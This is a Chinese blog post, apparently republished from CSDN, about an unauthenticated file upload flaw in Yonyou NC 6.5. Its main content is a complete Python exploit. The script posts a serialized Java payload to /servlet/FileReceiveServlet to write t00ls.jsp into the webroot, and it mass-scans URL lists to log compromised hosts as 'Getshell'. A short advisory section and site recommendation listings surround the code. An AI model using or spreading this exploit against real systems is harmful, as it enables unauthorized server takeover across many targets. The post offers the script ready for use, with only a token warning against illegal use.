用友python模块_最新用友NC6.5文件上传漏洞

最新推荐文章于 2024-07-16 00:15:00 发布
最新推荐文章于 2024-07-16 00:15:00 发布
阅读量1.6k 收藏
点赞数
文章标签: 用友python模块
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42299756/article/details/113721255
版权

0x00漏洞公告

用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限,目前,官方暂未发布补丁公告,建议使用该产品用户及时关注官方安全漏洞公告和补丁更新动态。

0x01影响范围

用友NC远程代码执行漏洞影响版本:NC6.5之后版本。

0x02漏洞描述

根据分析,漏洞为文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。

0x03 漏洞exp

这EXP是从Tools上的,利用成功后会向根目录写入一个T00ls.jsp文件,禁止利用于非法用途。

import requests

import threadpool

import urllib3

import sys

import argparse

urllib3.disable_warnings()

proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}

header = {

"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",

"Content-Type": "application/x-www-form-urlencoded",

"Referer": "https://google.com",

}

def multithreading(funcname, filename="url.txt", pools=5):

works = []

with open(filename, "r") as f:

for i in f:

func_params = [i.rstrip("\n")]

works.append((func_params, None))

pool = threadpool.ThreadPool(pools)

reqs = threadpool.makeRequests(funcname, works)

[pool.putRequest(req) for req in reqs]

pool.wait()

def wirte_targets(vurl, filename):

with open(filename, "a+") as f:

f.write(vurl + "\n")

return vurl

def exp(u):

uploadHeader = {

"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",

"Content-Type": "multipart/form-data;",

"Referer": "https://google.com"

}

uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"

shellFlag="t0test0ls"

uploadData+=shellFlag

try:

req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)

if req1.status_code == 200 :

req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)

if req3.text.index(shellFlag)>=0:

printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"

print (printFlag)

wirte_targets(printFlag, "vuln.txt")

except :

pass

#print(printFlag, end="")

if __name__ == "__main__":

if (len(sys.argv)) < 2:

print('useage : python' +str(sys.argv[0]) + ' -h')

else:

parser =argparse.ArgumentParser()

parser.description ='YONYOU UC 6.5 FILE UPLOAD!'

parser.add_argument('-u',help="url -> example [url]http://127.0.0.1[/url]",type=str,dest='check_url')

parser.add_argument('-r',help="url list to file",type=str,dest='check_file')

args =parser.parse_args()

if args.check_url:

exp(args.check_url)

if(args.check_file):

multithreading(exp, args.check_file, 8)

其实代码里面带了代理功能,可以通过Burp抓包看他请求的一个数据包

f9551d518de88af582bb47f4ec68e0d6.png

8d92dbf57259f26e93e5be2b1a071758.png

本文地址:https://blog.csdn.net/weixin_44578334/article/details/110917053

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

无知的人类在江湖
关注
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
NC6.5 文件服务器操作手册.pdf
09-08
NC6.5 文件服务器操作手册是用友网络科技股份有限公司提供的一份操作手册,旨在指导用户如何正确地使用NC6.5文件服务器。下面是基于手册的相关知识点: 系统框架 NC6.5文件服务器的系统框架是指该服务器的整体架构...
最新用友NC6.5文件上传漏洞
热门推荐
qax
12-09 1万+
0x00漏洞公告 用友NC产品文件上传漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限,目前,官方暂未发布补丁公告,建议使用该产品用户及时关注官方安全漏洞公告和补丁更新动态。 0x01影响范围 用友NC远程代码执行漏洞影响版本:NC6.5之后版本。 0x02漏洞描述 根据分析,漏洞文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。 0x03 漏洞exp
漏洞复现】用友NC——文件上传漏洞
最新发布
weixin_54799594的博客
07-16 1101
漏洞复现过程记录
漏洞复现--用友NC accept.jsp任意文件上传
qq_53003652的博客
11-07 734
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。上传成功,并且成功解析,可上传免杀马获得服务器权限。访问/test.jsp。
NC6.3.zip_NC 数据字典_NC6.5数据字典_nc.6.3数据字典_nc6.32数据字典_nc6.3数据字典
07-13
NC6.3数据字典(全),用友NC企业管理软件
nc6.5安装文件.zip
12-14
用友NC6采用SOA理念和J2EE架构设计,通过构建大企业私有云来实现集团企业全产业链管控,从而为中国集团企业提供一个支持客户化开发、全面快速响应本地化、合规化应用需求和创新需求,以及个性化配置、集成、实施、...
用友NC6.5安装金盘
05-28
### 用友NC6.5安装金盘知识点详解 #### 一、用友NC6.5简介 用友NC6.5是一款集成了财务管理、供应链管理、人力资源管理、客户关系管理等多个业务领域的综合企业管理软件。它为企业提供了一个全方位、多层次、多角度...
t3软件怎么生成报表_用友T3怎么生成财务报表 谢谢
weixin_39812186的博客
12-21 1352
展开全部用友2113软件中都有现5261成的财务报表,建立报表时只需4102要选择1653对应账套的行业性质版建立即可,如果报表选权择的行业性质和账套的行业性质不一致会导致报表数据库不对,或者报表根本取不了数据库。用友软件中如何正确建立财务报表,步骤如下所示:1、查看账套行业性质使用账套主管身份登录【系统管理】,登录时选中你要出报表的账套。登录到【系统管理】之后点击【修改】。这时会跳出一个新的界面...
NC65安全漏洞补丁.rar
06-08
用友 NC 是一款企业级管理软件,在近万家大中型企业使用。实现建模、开发、继承、运行、管理一体化的 IT 解决方案信息化平台,其代码实现逻辑上存在多处反序列化漏洞。   2020 年 6 月 4 日,有国内安全组织披露用友 NC 存在反序列化远程命令执行“0-Day”漏洞。经分析,漏洞真实存在,攻击者通过构造特定的 HTTP 请求,可以成功利用漏洞在目标服务器上执行任意命令,该漏洞风险极大,可能造成严重的信息泄露事件。鉴于漏洞利用的源代码已经公开,建议用户尽快修复此漏洞。   2、攻击原理   通过UClient打开用友NC,UClient本质为UBroswer,一个专用的用友NC浏览器嵌入了JAVA运行环境,以解决NC 6系列之前的版本中applet在不同设备上的应用问题。经过文件目录查看分析得知用友UClient安装后,会在用户目录下新建uclient文件夹,根据看到的NCLogin65.jar文件,结合java运行进程信息,分析得知是一些界面和登陆逻辑代码,nc_client_home则是NC应用依赖的其他一些代码和jar包,因此可以使用Luyten反编译工具查看NCLogin65.jar,通过简单运行NC应用,尝试进行用户登陆,使用wireshark抓包,查看app.log运行日志,发现大量serialize和deserialize,说明系统中应用了序列化方式来传送数据。在LoginUI类中的login方法打断点,启动Idea进行跟踪调试,当跟踪到loginImple方法时,发现多处调用了NCLocator的lookup方法查找Service接口进行操作,通过跟踪发现,实际使用了RmiNCLocator类,RmiNCLocator类的lookup方法,这里的lookup,已初步判断出无需继续跟踪调试,可以直接通过jndi注入漏洞进行利用。   黑客就是通过构造特定的 HTTP 请求,成功利用漏洞可在目标服务器上执行任意命令,漏洞暂无安全补丁发布,属 0Day 等级,风险极大。黑客利用漏洞可完全控制服务器,获取服务器的敏感信息。   3、影响范围   用友NC全版本
用友NC接口解决方案和思路!
01-06
此方案是解决用友NC与其他业务系统对接的资料,提供了现金的思想,并且实现了不同系统的数据共享和无缝连接。
用友NC全面解决方案
03-04
新世纪需要新管理新管理需要新一代的管理软件用友公司的NC管理软件正是顺应这一时代的要求而应运而生的NC用友公司在新世纪为各行业大中型企事业单位提供的基于网络化应用的全面应用解决方案。
关于上传漏洞以及NC提交
weixin_34227447的博客
08-09 318
我们可以利用的存在上传漏洞要求:上传文件路径可自己定义,或者文件名可定义。上传文件路径可自己定义:也就是为什么我们在抓包改包的时候要将保存上传文件的路径改为pic/123.asp空格,然后将之前上传没成功的123.asp文件名改为123.jpg,然后再用UltraEdit-32将空格改为00(具体过程请自行Google)。我们之前改过的包,上传路径变为了pic/123.asp...
用友python模块_为什么要学习python?西安汇杰告诉你真相
weixin_42309722的博客
12-23 333
一、什么是python爬虫?python爬虫即网络爬虫,网络爬虫是一种程序,主要用于搜索引擎,它将一个网站的所有内容与链接进行阅读,并建立相关的全文索引到数据库中,然后跳到另一个网站。根据上面的分析,西安汇杰.用友产业学院告诉你,可以把网络爬虫分为四步:1、获取网页数据2、解析网页数据3、存储网页数据4、分析网页数据二、python在办公软件中可以实现哪些功能?1 做行政很多公司已经用python...
基于Python实现模拟仿真数据包的发送
yujian631213952的博客
02-27 1174
基于Python实现模拟仿真数据包的发送 由于比较简单,先上代码 import socket import time def sendPacket(): endstr = "end" str = "" print('input your message,enter "end" to abort program: ') for line in iter(input, endstr): str += line + "\n" print('inpu
用友nc6.5 文件上传
09-06
请注意,以上步骤只是一般的文件上传流程,在用友NC6.5系统中,具体的文件上传操作可能会因业务模块或页面的不同而有所差异。所以,在具体操作时,最好参考系统提供的相关文档或向系统管理员咨询以获取详细的操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值